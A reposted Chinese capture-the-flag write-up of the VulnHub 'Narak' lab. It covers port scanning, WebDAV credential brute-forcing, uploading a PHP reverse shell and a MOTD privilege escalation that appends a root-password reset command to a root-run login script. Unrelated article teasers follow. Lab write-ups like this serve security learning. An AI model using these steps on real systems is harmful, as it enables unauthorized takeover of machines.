Narak

news2024/11/17 3:04:05

靶场下载

https://download.vulnhub.com/ha/narak.ova

信息收集

# nmap -sn 192.168.1.0/24 -oN live.nmap                            
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 22:18 CST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.00022s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 0bcc61d9e6ea39148e78c7c68571e53 (192.168.1.2)
Host is up (0.00012s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.66 (192.168.1.66)
Host is up (0.00030s latency).
MAC Address: 00:0C:29:C9:0F:6C (VMware)
Nmap scan report for 192.168.1.254 (192.168.1.254)
Host is up (0.00040s latency).
MAC Address: 00:50:56:F8:00:71 (VMware)
Nmap scan report for 192.168.1.60 (192.168.1.60)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.99 seconds

存活主机IP地址为:192.168.1.66

# nmap -sT --min-rate 10000 -p- 192.168.1.66 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 22:19 CST
Nmap scan report for 192.168.1.66 (192.168.1.66)
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:C9:0F:6C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.41 seconds

端口只开放了22 80端口,优先级还是在80端口上

# nmap -sT -sC -sV -O -p80,22 192.168.1.66 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 22:19 CST
Nmap scan report for 192.168.1.66 (192.168.1.66)
Host is up (0.00060s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 71:bd:59:2d:22:1e:b3:6b:4f:06:bf:83:e1:cc:92:43 (RSA)
|   256 f8:ec:45:84:7f:29:33:b2:8d:fc:7d:07:28:93:31:b0 (ECDSA)
|_  256 d0:94:36:96:04:80:33:10:40:68:32:21:cb:ae:68:f9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: NARAK
MAC Address: 00:0C:29:C9:0F:6C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds

服务版本信息探测之后,发现是Apache起的服务,版本为2.4.29 操作系统是ubuntu 没什么其他的信息了。

# nmap -sT --script=vuln -p22,80 192.168.1.66 -oN vuln.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 22:19 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.66 (192.168.1.66)
Host is up (0.00048s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.66
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.66:80/
|     Form id: 
|_    Form action: images/666.jpg
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
| http-enum: 
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
MAC Address: 00:0C:29:C9:0F:6C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 55.20 seconds

默认漏洞脚本探测结果:可能存在csrf漏洞,这个是优先级靠后的,泄露内网IP;两个目录:images 和w

ebdav

渗透测试

还是先从80端口上,开始看:

这里点击了“Do Not Click”!

出现了如上的图片,也没得到什么信息~ 由于之前的信息收集拿到了一个目录,去看一下,同时做一下目录的爆破:

整个目录扫描过程也没有发现什么新的路径,尝试访问webdav路径。

存在账号和密码~ 尝试找一下webdav的弱口令!

账号密码均为jigsaw,但是此处登陆失败了~

后来看到这个hacking articles,于是我就点了进去,看看是否有相关的文章,不出意外:

找到了一篇关于webdav的渗透测试文章~

该文章利用hydra进行的爆破,但是我们没有账号和密码。一个都没有,所以我们尝试先将账号的范围缩小一下:整个网站只有index中的about是有内容的,里面还有相关的人名和地名,所以就从中挑选出来几个:

密码使用了自己的字典~ 但是没成功~

密码可能不对,利用cewl进行网站的关键字爬取作为字典,再次进行爆破尝试:

成功拿到了账号和密码~ 进行登录:

又是这种目录,利用OPTIONS请求方式,查看是否可以上传文件!当然也可以看下上面的那篇文章!也是利用这种方式,通过PUT方式进行上传文件!

文章说是利用davtest进行文件的上传!使用davtest进行扫描:

davtest -url http://192.168.1.66/webdab/ -auth yamdoot:Swarg

经过测试发现是可以上传php文件的。文章提到上传文件的方式有很多,可以利用put的方式上传文件,当然也可以利用cadaver文件进行上传文件:

利用cadaver进行文件上传~

上传后在攻击机上起监听,同时点击反弹shell文件,进行触发:

提权

上来之后 提升shell的交互性!安装了python3!

查看/etc/passwd目录下面的用户,发现了三个活跃用户:

查看了各个用户家目录下面的文件,在inferno用户家目录下面发现第一个flag!

查看网站目录下是否存在提示性文件:

说是在creds.txt文件中存在开启 narak用户的提示!利用find命令查找creds文件!

find / -name "creds*" 2>/dev/null

找到文件中所说的文件,查看一下:

发现疑似base64 编码的字符串!尝试base64解码

还是这个账号和密码~ 难道能用ssh直接登陆吗? 或者说narak的密码就是这个? 这里尝试了 其实都不对的~ 在上面的/mnt目录下还发现了一个文件 hell.sh hell-地狱

查看这个文件的内容:

发现下面存在一行奇奇怪怪的字符,是被brainfuck加密的。如下是解密网站:

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

解密之后 又得到了一个字符,这个应该是密码了吧。这里尝试了三个用户的登录,最终在inferno用户成功登录了。之后便是提权阶段,这里看了好多,没打出来,于是看了大佬们的wp。是MOTD提权。于是便去了解了一下MOTD提权!

MOTD提权

MOTD全称为 message of the day!

当我们通过ssh登录成功的时候,我们如果留意的话,我们会发现输出的那些欢迎信息和日期等等,如果这些输出以上信息的脚本是以root权限运行的

并且我们当前这个用户对这些文件具有可读可写的权限的话,那么我们可以在这些sh脚本文件中写入修改root密码的命令,当我们再次通过ssh登录当前的这个用户的时候,那么会以root权限去执行这些文件,换句话说我们写入的命令也就被执行了!此时我们只需要 切换root用户,使用我们修改后的密码登陆即可!

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

查看/etc/update-motd.d/00-header文件,这个文件一般就是打印输出欢迎信息的脚本文件:

因此我们在下面添加修改root用户密码的命令:

echo 'root:123456' | chpasswd

将上面的整个命令添加到文件的末尾行!然后使用ssh 登陆当前的用户!最后在切换用户即可!

退出ssh,重新登录当前用户!使用修改后的密码,进行登录!

查看root目录下面的flag文件!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1309601.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

class080 状压dp-上【算法】

class080 状压dp-上【算法】 算法讲解080【必备】状压dp-上 Code1 464. 我能赢吗 // 我能赢吗 // 给定两个整数n和m // 两个玩家可以轮流从公共整数池中抽取从1到n的整数(不放回) // 抽取的整数会累加起来(两个玩家都算) // 谁在…

【Python】人工智能-机器学习——不调库手撕深度网络分类问题

1. 作业内容描述 1.1 背景 数据集大小150该数据有4个属性,分别如下 Sepal.Length:花萼长度(cm)Sepal.Width:花萼宽度单位(cm)Petal.Length:花瓣长度(cm)Petal.Width:花瓣宽度(cm)category:类别&#xff0…

flutter调试器查看不了副页面(非主页面/子页面)

刚接触flutter,写了两个页面,通过按钮,可以从主页面跳转到副页面,副页面我自己写的一个独立的dart文件,在主页面的代码中导入使用。但是当我运行代码后,点击跳转的时候,却发现查看不到对应的副页…

用CHAT了解生活中的化学

问CHAT:生活中有哪些常见的氢氧化合物? CHAT回复:生活中常见的氢氧化合物有以下几种: 1. 氢氧化钠(NaOH):也叫苛性钠,是一种强碱性物质,主要用于造纸、肥皂制作、人造纤维和棉纺等工业中。 2.…

php实现截取姓名中的第一个字作为头像的实战记录

php 截取中文字符串第一个字 substr 函数 在 PHP 中,使用 substr 函数来截取中文字符串的第一个字。由于 PHP 默认的字符编码是 UTF-8,它可以正确处理中文字符。 $chineseString "你好世界"; $firstChar substr($chineseString, 0, 1); e…

TCP对数据的拆分

应用程序的数据一般都比较大,因此TCP会按照网络包的大小对数据进行拆分。 当发送缓冲区中的数据超过MSS的长度,数据会被以MSS长度为单位进行拆分,拆分出来的数据块被放进单独的网路包中。 根据发送缓冲区中的数据拆分情况,当判断…

ERP主要是干什么的

在信息技术快速发展的背景下,很多企业为了应对这些技术带来的机遇和挑战,也为了提高企业的竞争力和效率,提高企业管理水平,选择使用ERP系统来帮助企业进一步的发展。但是也有部分企业没明白ERP到底是干什么的,所以有些…

数据结构:图的存储和遍历

文章目录 图的存储结构邻接矩阵邻接矩阵的存储模拟实现 邻接表邻接表的模拟实现 图的遍历DFS和BFS遍历 图的存储结构和遍历的实现 图也是一种数据结构,在实际生活中有广泛运用,因此本篇总结的就是图的存储等 图的存储结构 在图中既有节点,也…

【docker 】Dockerfile指令学习

学习文档地址 上篇文章:【docker 】基于Dockerfile创建镜像 Dockerfile指令文档地址 .dockerignore 文件 Dockerfile指令 常见的指令 Dockerfile 指令说明FROM指定基础镜像,用于后续的指令构建。MAINTAINER指定Dockerfile的作者/维护者。&#xff…

代码审计零基础入门之思路篇

0x01 前言 ThinkPHP 是一款开源的 PHP 框架,用于快速、简单地开发 PHP 应用程序。它提供了一套丰富的功能和工具,使开发者能够更容易地构建各种规模的 Web 应用。ThinkPHP 的目标是提高开发效率,同时保持代码的可读性和可维护性。thinkphp的…

mysql:在字符串类型的列上创建索引,建议指定索引前缀长度

https://dev.mysql.com/doc/refman/8.2/en/create-index.html#create-index-column-prefixes 在字符串类型的列上创建索引,建议指定索引前缀长度,而没有必要用整个列来创建索引。因为用前面的字符创建索引,查询时并不会比在整列上创建索引慢很…

绿盟 SAS堡垒机 local_user.php 权限绕过漏洞复现

0x01 产品简介 SAS 安全审计系统是绿盟科技开发的一款堡垒机。 0x02 漏洞概述 绿盟 SAS堡垒机 local_user.php接口处存在权限绕过漏洞,未经身份认证的攻击者可以访问他们通常无权访问的敏感资源,最终导致系统处于极度不安全状态。 0x03 复现环境 FOFA: body="/ne…

土壤科学灌溉CG-36 土壤水势传感器

土壤科学灌溉CG-36 土壤水势传感器产品概述 土壤水势传感器可以很方便地插入到土壤剖面坑中,在其周围包裹上湿土即可。测定和记录非常简单。免维护、无需校准即可测量较大范围的土壤水势;无需灌水,大量程使得它成为测量自然系统水势的理想传…

javacv的视频截图功能

之前做了一个资源库的小项目,因为上传资源文件包含视频等附件,所以就需要时用到这个功能。通过对视频截图,然后作为封面缩略图,达到美观效果。 首先呢,需要准备相关的jar包,之前我用的是低版本的1.4.2&…

spring boot 实现直播聊天室(二)

spring boot 实现直播聊天室(二) 技术方案: spring bootnettyrabbitmq 目录结构 引入依赖 <dependency><groupId>io.netty</groupId><artifactId>netty-all</artifactId><version>4.1.96.Final</version> </dependency>Si…

位1的个数

题目链接 位1的个数 题目描述 注意点 输入必须是长度为 32 的 二进制串 解答思路 位运算判断每一位是否为1 代码 public class Solution {// you need to treat n as an unsigned valuepublic int hammingWeight(int n) {int res 0;for (int i 0; i < 32; i) {res …

Mac中nvm切换node版本失败

Mac中使用 nvm 管理 node 版本&#xff0c;在使用指令&#xff1a;nvm use XXX 切换版本之后。 关闭终端&#xff0c;再次打开&#xff0c;输入 node -v 还是得到之前的 node 版本。 原因&#xff1a; 在这里这个 default 中有个 node 的版本号&#xff0c;使用 nvm use 时&a…

【玩转TableAgent数据智能分析】会话式数据分析,所需即所得!

目录 1 TableAgent介绍 2 TableAgent五大优点 3 体验TableAgent 3.1 登录TableAgent平台 3.2 会话式数据分析 4 总结 【优化改善】 【对比TableAgent与文心一言- E言易图】 1 TableAgent介绍 TableAgent是一款数据集成和分析平台&#xff0c;它可以帮助用户从多个数据源中…

【wimdows电脑上管理员账户与管理员身份的区别】

管理员账户 在控制面板的用户账户中&#xff0c;点击更改账户类型&#xff0c;可以看到目前的账户是“管理员账户”还是“标准账户”。 管理员身份 在快捷方式上右击&#xff0c;可以看到&#xff0c;可以选择以管理员身份运行该软件。 如何查看某个应用是否以管理员身份…

大数据云计算之OpenStack

大数据云计算之OpenStack 1.什么是OpenStack&#xff0c;其作用是什么&#xff1f;OpenStack主要的组成模块有哪些&#xff1f;各自的主要作用是什么&#xff1f; OpenStack是一个开源的云计算平台&#xff0c;旨在为企业和服务提供商提供私有云和公有云的建设和管理解决方案…